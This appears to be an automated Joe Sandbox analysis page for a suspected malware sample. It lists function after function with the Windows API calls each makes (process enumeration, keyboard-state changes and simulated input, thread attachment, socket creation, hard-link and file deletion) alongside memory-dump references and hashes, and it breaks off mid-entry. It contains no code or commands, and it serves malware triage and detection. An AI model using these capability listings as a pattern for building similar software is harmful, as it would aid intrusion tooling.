                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Variant$ClearInitInitializeUninitialize
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1998397398-0
                                                                                                                                                                                                                                      • Opcode ID: bf0cff139d3be5985c56150b0ea6f3b4286fb06ae3a09bbae018fd8915de6049
                                                                                                                                                                                                                                      • Instruction ID: 786640681dee81a6ba983760e5e428920234a554682de5c7877bf4d1a847acad
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bf0cff139d3be5985c56150b0ea6f3b4286fb06ae3a09bbae018fd8915de6049
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0A15B35604345DFC700DF29D885A6AB7E5FF88754F049859F98AAB361CB30ED01CB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00EEAF05
                                                                                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00EEAF13
                                                                                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00EEAFF5
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00EEB004
                                                                                                                                                                                                                                        • Part of subcall function 00E7DE05: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00EA3DD3,?), ref: 00E7DE2F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2000298826-0
                                                                                                                                                                                                                                      • Opcode ID: 250becea6c9db7eb82adedc32ccc5599dec7629c88ef7c493835270582021774
                                                                                                                                                                                                                                      • Instruction ID: 6c9870cbde8772d19043a9efddba8435d61c9da014a4a36e67f02053c653738c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 250becea6c9db7eb82adedc32ccc5599dec7629c88ef7c493835270582021774
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8513E71608344AFC310EF25DC86A5BBBE8FF89754F00592DF595A7251EB70E904CB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00EE2356
                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00EE2364
                                                                                                                                                                                                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00EE23E3
                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00EE23ED
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$socket
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1881357543-0
                                                                                                                                                                                                                                      • Opcode ID: a81dd3e2d0ceb29a06d96b7e87a1e1c2402c2cf02dc1d26f5ef4fce5137b1141
                                                                                                                                                                                                                                      • Instruction ID: effa84745074839a59ccd724b10256177b7663e730db94694599724daac23e65
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a81dd3e2d0ceb29a06d96b7e87a1e1c2402c2cf02dc1d26f5ef4fce5137b1141
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7541F234600204AFE720AF25D886F2A77D9AF44348F54D45CFA5AAF2D2D772ED42CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00EF6AE2
                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00EF6B15
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00EF6B82
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3880355969-0
                                                                                                                                                                                                                                      • Opcode ID: 4baf60eea2b1b6d6084e6df4101ea93225270152a58de6df77268b718116320a
                                                                                                                                                                                                                                      • Instruction ID: 9ed5e5533ff29d8647594e1651acb3c4a49f820c8e279374bf0a4c95312765d4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4baf60eea2b1b6d6084e6df4101ea93225270152a58de6df77268b718116320a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A512C74A00209EFCF14DF58D885ABE7BB6EB94364F109169FA15EB2A0D730ED81DB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00ED5FD3
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00ED5FF9
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00ED601E
                                                                                                                                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00ED604A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3321077145-0
                                                                                                                                                                                                                                      • Opcode ID: f67ae1531e301782ee03baf9cec026ea676cf84581cef11ddfaa09e1601811f8
                                                                                                                                                                                                                                      • Instruction ID: a04c4c9d0c13d5873b00edf1bd544d4e8567ee126317c904d2cdfc077a8e4fa5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f67ae1531e301782ee03baf9cec026ea676cf84581cef11ddfaa09e1601811f8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE415B35600611DFCB11EF15D544A2EBBE2EF89764B189489E84ABF362CB30FC01DB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00ECB162
                                                                                                                                                                                                                                      • SetKeyboardState.USER32(00000080), ref: 00ECB17E
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00ECB1EC
                                                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00ECB23E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 432972143-0
                                                                                                                                                                                                                                      • Opcode ID: 7b26a618da2bffd90e5c94e64e114c52006e2cc297ed9e2b0ae810a185bc4707
                                                                                                                                                                                                                                      • Instruction ID: 18fb9b7fe6b9e3b5711f8de03985fe9693cd2cc54eb19664e89ec1380628bfd9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b26a618da2bffd90e5c94e64e114c52006e2cc297ed9e2b0ae810a185bc4707
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8315970A41248AEFF358B298D1AFFE7BA5AB84314F08621EE490B61D0C7768D47C791
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00EF5BB9
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EF5BDC
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EF5BE9
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00EF5C0F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3340791633-0
                                                                                                                                                                                                                                      • Opcode ID: ee37713927a8646affda1127b29dcad9f4fce1bce34dadb4e9a5a1b49ae2a54f
                                                                                                                                                                                                                                      • Instruction ID: 6fdba4a96fe30c076ec28c7eb933b82e7651775bada6e7c2543a8a5b49f5e28e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee37713927a8646affda1127b29dcad9f4fce1bce34dadb4e9a5a1b49ae2a54f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA319236B96A0CBFEB219F14CC05FF87762EB15355F186002B712B61E1C7745980DB41
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?,7736A2E0,?,00008000), ref: 00ECB2A7
                                                                                                                                                                                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00ECB2C3
                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00ECB32A
                                                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,7736A2E0,?,00008000), ref: 00ECB37C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 432972143-0
                                                                                                                                                                                                                                      • Opcode ID: b597d63e6b764591782406463a6159f78b7541594c4ae9d0a6b7298ba4c609cb
                                                                                                                                                                                                                                      • Instruction ID: ca81b12a453666e467303b66adf76e5649165d3c3c84937caec7d59702d3838a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b597d63e6b764591782406463a6159f78b7541594c4ae9d0a6b7298ba4c609cb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B316D30940298EEFF348B698D06FFE7BA5AB85314F08521EF481B61D1C3B68947CB56
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ClientToScreen.USER32(?,?), ref: 00EF7E9A
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00EF7F10
                                                                                                                                                                                                                                      • PtInRect.USER32(?,?,00EF93AA), ref: 00EF7F20
                                                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 00EF7F8C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1352109105-0
                                                                                                                                                                                                                                      • Opcode ID: d2720184e9be3424cfc94e3f9858a88f716da5e9fc06c0869b3ec3c540c17ce1
                                                                                                                                                                                                                                      • Instruction ID: c5063adc95f6a720909cac486ababba383cc710773e2590c0cddd48ccd362f99
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d2720184e9be3424cfc94e3f9858a88f716da5e9fc06c0869b3ec3c540c17ce1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5416E3270921DDFCB01CF59C884EB97BF6FB48314F1550A9EA98AB261C330A941DB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 00EF1F50
                                                                                                                                                                                                                                        • Part of subcall function 00EC40CD: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EC40E7
                                                                                                                                                                                                                                        • Part of subcall function 00EC40CD: GetCurrentThreadId.KERNEL32 ref: 00EC40EE
                                                                                                                                                                                                                                        • Part of subcall function 00EC40CD: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00EC2C3D), ref: 00EC40F5
                                                                                                                                                                                                                                      • GetCaretPos.USER32(?), ref: 00EF1F64
                                                                                                                                                                                                                                      • ClientToScreen.USER32(00000000,?), ref: 00EF1FB1
                                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 00EF1FB7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2759813231-0
                                                                                                                                                                                                                                      • Opcode ID: 4e9d23e65a529288077c2a65f3375efb013854b63944751836a07caac160fa9f
                                                                                                                                                                                                                                      • Instruction ID: 31b24938db321ad249696c10463ada84cec0a39472aa7c0e59efcc4b759f3bf2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e9d23e65a529288077c2a65f3375efb013854b63944751836a07caac160fa9f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D316571E00109AFC700DFAAC885CAEBBF9EF48348B54506AE515F7251D7319E05CBA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 00EC5333
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00EC5350
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00EC5388
                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00EC53AE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2796087071-0
                                                                                                                                                                                                                                      • Opcode ID: 7012ce1e89dbc81bc460fba47158288669efc0e71204b2cfff07e84b20b8e7d3
                                                                                                                                                                                                                                      • Instruction ID: b1639032e8c8e856cf11adce40b954bedb2b249bb4e626bf8869005cca6e674e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7012ce1e89dbc81bc460fba47158288669efc0e71204b2cfff07e84b20b8e7d3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF212832204644ABEB156B299C49F7B7FD9DF85750F10502EF809EA081DAA1E881D750
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00ECDBB7
                                                                                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00ECDBC5
                                                                                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00ECDBE5
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00ECDC92
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 420147892-0
                                                                                                                                                                                                                                      • Opcode ID: a3d08c8501becb6fe6cca32be9bdbe1d66cf2f59acac15985a5bf88ffd9aa35c
                                                                                                                                                                                                                                      • Instruction ID: 08807f1e368d5a37bb53f5947aa18e796b931cc436d8be5cd65a65e5da384fc2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a3d08c8501becb6fe6cca32be9bdbe1d66cf2f59acac15985a5bf88ffd9aa35c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E316D711083009FD301EF54EC85FAEBBE8AF99394F14192DF585A31A1EB729949CB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E79DA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E79DB2
                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00EF9822
                                                                                                                                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00EB7D0D,?,?,?,?,?), ref: 00EF9837
                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00EF987F
                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00EB7D0D,?,?,?), ref: 00EF98B5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
